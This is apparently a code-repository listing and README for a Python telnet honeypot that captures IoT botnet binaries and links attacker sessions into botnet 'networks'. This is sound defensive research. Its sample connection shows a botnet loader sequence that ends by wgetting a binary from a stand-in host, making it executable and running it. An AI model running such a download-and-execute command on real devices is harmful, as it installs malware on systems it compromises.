telnet-iot-honeypot-master
Category: Remote control / remote desktop
Development tool: Python
File size: 1371KB
Downloads: 1
Upload date: 2020-10-10 06:07:58
Uploader: asmijee
Description: Python telnet honeypot for catching botnet binaries
File list (size, date):
Dockerfile (195, 2020-07-22)
INSTALL.md (3686, 2020-07-22)
backend.py (1950, 2020-07-22)
backend (0, 2020-07-22)
backend\__init__.py (0, 2020-07-22)
backend\additionalinfo.py (2836, 2020-07-22)
backend\authcontroller.py (1969, 2020-07-22)
backend\backend.py (7436, 2020-07-22)
backend\clientcontroller.py (13057, 2020-07-22)
backend\cuckoo.py (3086, 2020-07-22)
backend\db.py (16947, 2020-07-22)
backend\ipdb (0, 2020-07-22)
backend\ipdb\__init__.py (0, 2020-07-22)
backend\ipdb\ipdb.py (2113, 2020-07-22)
backend\virustotal.py (2259, 2020-07-22)
backend\virustotal_fill_db.py (828, 2020-07-22)
backend\webcontroller.py (7682, 2020-07-22)
config.dist.yaml (2509, 2020-07-22)
create_config.sh (293, 2020-07-22)
create_docker.sh (2451, 2020-07-22)
honeypot.py (2072, 2020-07-22)
honeypot (0, 2020-07-22)
honeypot\__init__.py (0, 2020-07-22)
honeypot\__main__.py (206, 2020-07-22)
honeypot\client.py (1717, 2020-07-22)
honeypot\sampledb_client.py (3092, 2020-07-22)
honeypot\session.py (1969, 2020-07-22)
honeypot\shell (0, 2020-07-22)
honeypot\shell\__init__.py (0, 2020-07-22)
honeypot\shell\commands (0, 2020-07-22)
honeypot\shell\commands\__init__.py (0, 2020-07-22)
honeypot\shell\commands\base.py (5326, 2020-07-22)
honeypot\shell\commands\binary.py (2521, 2020-07-22)
honeypot\shell\commands\cmd_util.py (227, 2020-07-22)
honeypot\shell\commands\shell.py (675, 2020-07-22)
honeypot\shell\commands\shellcode.py (1641, 2020-07-22)
... ...
# Telnet IoT honeypot
'Python telnet honeypot for catching botnet binaries'
This project implements a Python telnet server that acts as a honeypot for IoT malware which spreads over horribly insecure default passwords on telnet servers on the internet.
The honeypot works by emulating a shell environment, just like cowrie (https://github.com/micheloosterhof/cowrie).
The aim of this project is primarily to automatically analyse botnet connections and "map" botnets by linking different connections, and even networks, together.
## Architecture
The application has a client/server architecture, with a client (the actual honeypot) accepting telnet connections and a server which receives information about connections and does the analysis.
The backend server exposes an HTTP interface which is used to access the frontend as well as by the clients to push new connection information to the backend.
## Automatic analysis
The backend uses two different mechanisms to automatically link connections:
### Networks
Networks are discovered botnets. A network is the set of all linked connections, URLs and samples. URLs and samples are linked when they are used in a connection. Two connections are linked when both connections are received by the same honeypot client (multiple clients are supported!) and use the same credentials within a short period of time (default 2 minutes), or when they come from the same IP address.
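The linking rule above, worked through as an added example that is not part of the project's backend: a few constructed connection records are merged into networks with a small union-find, carrying along the URLs and samples each connection used. `Connection`, `linked` and `build_networks` are assumed names.

```python
from dataclasses import dataclass, field

LINK_WINDOW_SECONDS = 120  # README default: same credentials within 2 minutes

@dataclass
class Connection:
    cid: str        # connection id
    client: str     # honeypot client that received it
    ip: str         # attacker source address
    creds: tuple    # (username, password) used to log in
    ts: int         # login time, seconds since epoch
    urls: set = field(default_factory=set)     # URLs fetched in the session
    samples: set = field(default_factory=set)  # sample hashes downloaded

def linked(a, b):
    """README rule: same client and credentials inside the window, or same IP."""
    if a.ip == b.ip:
        return True
    return (a.client == b.client and a.creds == b.creds
            and abs(a.ts - b.ts) <= LINK_WINDOW_SECONDS)

def build_networks(conns):
    """Union-find over all linked pairs; a network is the set of its connections
    plus every URL and sample those connections used."""
    parent = {c.cid: c.cid for c in conns}
    def find(x):
        while parent[x] != x:
            x = parent[x]
        return x
    for i, a in enumerate(conns):
        for b in conns[i + 1:]:
            if linked(a, b):
                parent[find(a.cid)] = find(b.cid)
    nets = {}
    for c in conns:
        n = nets.setdefault(find(c.cid),
                            {"connections": set(), "urls": set(), "samples": set()})
        n["connections"].add(c.cid)
        n["urls"] |= c.urls
        n["samples"] |= c.samples
    return list(nets.values())

# Constructed sample data (not real honeypot observations): c1/c2 share client and
# credentials a minute apart, c2/c3 share an IP, c4 reuses the credentials hours later.
SAMPLE = [
    Connection("c1", "hp-a", "198.51.100.7", ("root", "default"), 1000, {"http://example.com:4636/.i"}, {"sample-A"}),
    Connection("c2", "hp-a", "198.51.100.9", ("root", "default"), 1060),
    Connection("c3", "hp-b", "198.51.100.9", ("admin", "admin"), 5000, samples={"sample-B"}),
    Connection("c4", "hp-a", "203.0.113.4", ("root", "default"), 9000),
]
```

Note that c4 shares client and credentials with c1 but falls outside the 2-minute window and comes from a different address, so it forms a network of its own.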
### Malware
Multiple networks are identified as using the same type of malware if the text entered during the sessions of those networks is mostly the same. This comparison is done using a kind of "hash" function which translates a session (or connection) into a sequence of words and then maps each word to a single byte, so that the resulting byte sequence can be searched easily.
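The word-to-byte session "hash" described above, as an added illustration rather than the project's own implementation: the tokenizer (split on whitespace and shell separators), the 0.8 similarity cutoff and the `SessionHasher` class are assumptions; the README's sample connection further down this page is used as the first input, the other two sessions are constructed.

```python
import difflib
import re

SIMILARITY_THRESHOLD = 0.8  # assumed cutoff for "mostly the same" sessions

class SessionHasher:
    """Splits a session into words and gives each distinct word one byte, so a
    whole session becomes a byte string that can be compared and searched.
    Illustrative only; the project's own tokenizer and vocabulary rules are not on the page."""
    UNKNOWN = 0xFF  # reserved byte for words beyond the 255-word vocabulary

    def __init__(self):
        self.vocab = {}  # word -> byte value

    def words(self, text):
        # Split on whitespace and shell separators; ';', '|' and parentheses carry no signal
        return re.findall(r"[^\s;|()]+", text)

    def hash_session(self, text):
        out = bytearray()
        for word in self.words(text):
            if word not in self.vocab:
                self.vocab[word] = min(len(self.vocab), self.UNKNOWN)
            out.append(self.vocab[word])
        return bytes(out)

    def same_malware(self, h1, h2):
        # Two sessions belong to the same malware if their byte sequences mostly match
        return difflib.SequenceMatcher(None, h1, h2).ratio() >= SIMILARITY_THRESHOLD

    def find_sequence(self, h, words):
        # Locate a word sequence inside a hashed session with a plain bytes search; -1 if absent
        if any(w not in self.vocab for w in words):
            return -1
        return h.find(bytes(self.vocab[w] for w in words))

# SESSION_A is the README's sample connection; B and C are constructed variants.
SESSION_A = """enable
shell
sh
cat /proc/mounts; /bin/busybox PEGOK
cd /tmp; (cat .s || cp /bin/echo .s); /bin/busybox PEGOK
nc; wget; /bin/busybox PEGOK
(dd bs=52 count=1 if=.s || cat .s)
/bin/busybox PEGOK
rm .s; wget http://example.com:4636/.i; chmod +x .i; ./.i; exit
"""
# Same loader with a different marker token and download host: should still match
SESSION_B = SESSION_A.replace("PEGOK", "ABCDE").replace("example.com:4636", "203.0.113.5:8080")
# Unrelated hand-typed session: should not match
SESSION_C = "enable\nsystem\nshell\nsh\ncat /proc/cpuinfo\nuname -a\nexit\n"
```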
# Running
The application has a config file named config.py. Samples are included for local and client/server deployments.
## Configuration
The backend requires a SQL database (default sqlite) which is initialized at first run. Before the first run you should generate an admin account which is used to create more users. The admin account can also be used directly by a client to post connections. When more than one honeypot is to be connected, creating multiple users is recommended.

```
bash create_config.sh
```

Both client and backend read the files `config.yaml` and `config.dist.yaml` for their configuration parameters. The `config.dist.yaml` file includes default values for everything except the admin user credentials, and these defaults are overwritten by entries in the `config.yaml` file.
## Running the Server

```
python backend.py
```

## Running the Client
This project contains its own honeypot; however, because of the client-server architecture, other honeypots can be used as well.
### Using the built-in honeypot

```
python honeypot.py
```

The client cannot be started without the server running. To use a different configuration for the client you can use the `-c` switch like this:

```
python honeypot.py -c myconfig.yaml
```

If you only want to check the honeypot functionality, you can start the client in interactive mode:

```
python honeypot shell
```

### Using cowrie
I wrote an output plugin for cowrie, which has many more features than the built-in honeypot. If you want to use cowrie instead, check out my fork which includes the output module here: https://github.com/Phype/cowrie .
## Opening the frontend
After the server is started, open `http://127.0.0.1/` in your favorite browser.
## Sample Connection

```
enable
shell
sh
cat /proc/mounts; /bin/busybox PEGOK
cd /tmp; (cat .s || cp /bin/echo .s); /bin/busybox PEGOK
nc; wget; /bin/busybox PEGOK
(dd bs=52 count=1 if=.s || cat .s)
/bin/busybox PEGOK
rm .s; wget http://example.com:4636/.i; chmod +x .i; ./.i; exit
```
## Images
![Screenshot 1](images/screen1.png)
![Screenshot 2](images/screen2.png)
![Screenshot 3](images/screen3.png)